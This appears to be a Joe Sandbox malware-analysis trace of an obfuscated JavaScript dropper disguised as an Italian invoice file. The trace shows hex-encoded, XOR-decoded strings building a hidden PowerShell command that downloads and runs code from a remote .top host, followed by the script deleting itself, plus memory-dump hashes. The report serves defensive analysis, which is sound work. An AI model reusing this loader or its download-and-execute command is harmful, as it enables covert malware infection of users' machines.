                                                                                                                                                        • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                        • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                        • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                        • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                        • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                        • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                        • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                        • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                        • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                        • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                        29
                                                                                                                                                        var fjZ7Iiu9v01XhVSxrM8os9TsWrSi6YcTVW1dlD = [ "16c27", "16c38", "16c20", "16c32", "16c25", "16c24", "16c3f", "16c32", "16c3b", "16c3b", "16c77", "16c7a", "16c39", "16c38", "16c27", "16c25", "16c38", "16c31", "16c3e", "16c3b", "16c32", "16c77", "16c7a", "16c32", "16c2f", "16c32", "16c34", "16c22", "16c23", "16c3e", "16c38", "16c39", "16c27", "16c38", "16c3b", "16c3e", "16c34", "16c2e", "16c77", "16c35", "16c2e", "16c27", "16c36", "16c24", "16c24", "16c77", "16c7a", "16c00", "16c3e", "16c39", "16c33", "16c38", "16c20", "16c04", "16c23", "16c2e", "16c3b", "16c32", "16c77", "16c3f", "16c3e", "16c33", "16c33", "16c32", "16c39", "16c77", "16c7a", "16c34", "16c77", "16c75", "16c34", "16c22", "16c25", "16c3b", "16c77", "16c7a", "16c22", "16c24", "16c32", "16c35", "16c77", "16c70" ];
                                                                                                                                                          30
                                                                                                                                                          return fjZ7Iiu9v01XhVSxrM8os9TsWrSi6YcTVW1dlD;
                                                                                                                                                            31
                                                                                                                                                            }
                                                                                                                                                              32
                                                                                                                                                              fjZ7Iiu9v01XhVSxrM8os9TsWrSi6YcTVW1dlD.Run (
                                                                                                                                                              • Run("powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"") ➔ 0
                                                                                                                                                              33
                                                                                                                                                              function () {
                                                                                                                                                              • () ➔ "powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb '"
                                                                                                                                                              • () ➔ "powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb '"
                                                                                                                                                              34
                                                                                                                                                              var TF1RofqohJJfSVVN2 = '';
                                                                                                                                                                35
                                                                                                                                                                var fjZ7Iiu9v01XhVSxrM8os9TsWrSi6YcTVW1dlDuv9CB6t1xh7AR = e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr ( ).length;
                                                                                                                                                                • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                                36
                                                                                                                                                                for ( var TF1RofqohJJfSVVN22134dfss = 0 ; TF1RofqohJJfSVVN22134dfss < fjZ7Iiu9v01XhVSxrM8os9TsWrSi6YcTVW1dlDuv9CB6t1xh7AR ; TF1RofqohJJfSVVN22134dfss ++ )
                                                                                                                                                                  37
                                                                                                                                                                  {
                                                                                                                                                                    38
                                                                                                                                                                    TF1RofqohJJfSVVN2 += String.fromCharCode ( parseInt ( e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr ( ) [TF1RofqohJJfSVVN22134dfss], 0.25 * 8 * 2 * 2 * 0.5 * 4 ) ^ ( 11.25 * 8 * 1000 + 9.375 * 320 + 12.5 * 16 + 3.5 * 20 + 1 ) );
                                                                                                                                                                    • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                                    • parseInt("16c27",16) ➔ 93223
                                                                                                                                                                    • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                                    • parseInt("16c38",16) ➔ 93240
                                                                                                                                                                    • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                                    • parseInt("16c20",16) ➔ 93216
                                                                                                                                                                    • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                                    • parseInt("16c32",16) ➔ 93234
                                                                                                                                                                    • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                                    • parseInt("16c25",16) ➔ 93221
                                                                                                                                                                    • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                                    • parseInt("16c24",16) ➔ 93220
                                                                                                                                                                    • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                                    • parseInt("16c3f",16) ➔ 93247
                                                                                                                                                                    • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                                    • parseInt("16c32",16) ➔ 93234
                                                                                                                                                                    • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                                    • parseInt("16c3b",16) ➔ 93243
                                                                                                                                                                    • e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() ➔ 16c27,16c38,16c20,16c32,16c25,16c24,16c3f,16c32,16c3b,16c3b,16c77,16c7a,16c39,16c38,16c27,16c25,16c38,16c31,16c3e,16c3b,16c32,16c77,16c7a,16c32,16c2f,16c32,16c34,16c22,16c23,16c3e,16c38,16c39,16c27,16c38,16c3b,16c3e,16c34,16c2e,16c77,16c35,16c2e,16c27,16c36,16c24,16c24,16c77,16c7a,16c00,16c3e,16c39,16c33,16c38,16c20,16c04,16c23,16c2e,16c3b,16c32,16c77,16c3f,16c3e,16c33,16c33,16c32,16c39,16c77,16c7a,16c34,16c77,16c75,16c34,16c22,16c25,16c3b,16c77,16c7a,16c22,16c24,16c32,16c35,16c77,16c70
                                                                                                                                                                    • parseInt("16c3b",16) ➔ 93243
                                                                                                                                                                    39
                                                                                                                                                                    }
                                                                                                                                                                      40
                                                                                                                                                                      return TF1RofqohJJfSVVN2;
                                                                                                                                                                        41
                                                                                                                                                                        } ( ) + OSbmnwBUMyABGVq5kiJel6TAidu0naN0lFiRPaNM56iSBOgrubjeWvTWOSfUckGWZK6s35WAHIPB17pDU0WR1MxN2qQhA ( ) + "' | i" + String.fromCharCode ( parseInt ( ( ( 20 * 4 * 10 ) ^ ( ( 100 + 73 ) * 5 ) ), 2 * 2 * 4 ) ) + "x\"" ) ;
                                                                                                                                                                          42
                                                                                                                                                                          var uv9CB6t1xh7AR = WScript.CreateObject ( "Scripting.FileSystemObject" );
                                                                                                                                                                          • Windows Script Host.CreateObject("Scripting.FileSystemObject") ➔
                                                                                                                                                                          43
                                                                                                                                                                          uv9CB6t1xh7AR.DeleteFile ( WScript.ScriptFullName );
                                                                                                                                                                          • DeleteFile("C:\Users\hubert\Desktop\Fattura72543461.js") ➔ undefined
                                                                                                                                                                          Reset < >
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.1804614244.00007FFB4A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A240000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ffb4a240000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c12cbcd5abcaf0d095998ed3e9b8c904b95957a3451106b7967a84ad0c4fd141
                                                                                                                                                                            • Instruction ID: eb7dde48f7bcbbf86ec24a39792ec6279ed72373b271fe01eb45957cb481806f
                                                                                                                                                                            • Opcode Fuzzy Hash: c12cbcd5abcaf0d095998ed3e9b8c904b95957a3451106b7967a84ad0c4fd141
                                                                                                                                                                            • Instruction Fuzzy Hash: DFD155A290EA9A4FE7A6FF78C8555B57FD8EF15310B2801FED44DCB093D918A805E381
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.1804171685.00007FFB4A170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ffb4a170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                            • Instruction ID: 76459e0e81724cc35fcd663042973c399dbd20ac7a201b77b9da5333077781b9
                                                                                                                                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                            • Instruction Fuzzy Hash: CD01677111CB0D4FD748EF0CE451AA5B7E0FB95364F10156DE58AC3691DA36E882CB45
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.1804171685.00007FFB4A170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ffb4a170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ^cO$^}
                                                                                                                                                                            • API String ID: 0-2012577305
                                                                                                                                                                            • Opcode ID: 2e3b0d08be201bc992c4179ec55990055f1e52b7b965aa76eda81f478e2f5e4a
                                                                                                                                                                            • Instruction ID: b4e50b21ce870f2fc513864faafe8bb17767f05775d9e6bd3a1bf3a5a28cda17
                                                                                                                                                                            • Opcode Fuzzy Hash: 2e3b0d08be201bc992c4179ec55990055f1e52b7b965aa76eda81f478e2f5e4a
                                                                                                                                                                            • Instruction Fuzzy Hash: 90F1929794E7D20FE7136EBC98651E63FA0DF53224B1910FBC5C98E093E819684B87A1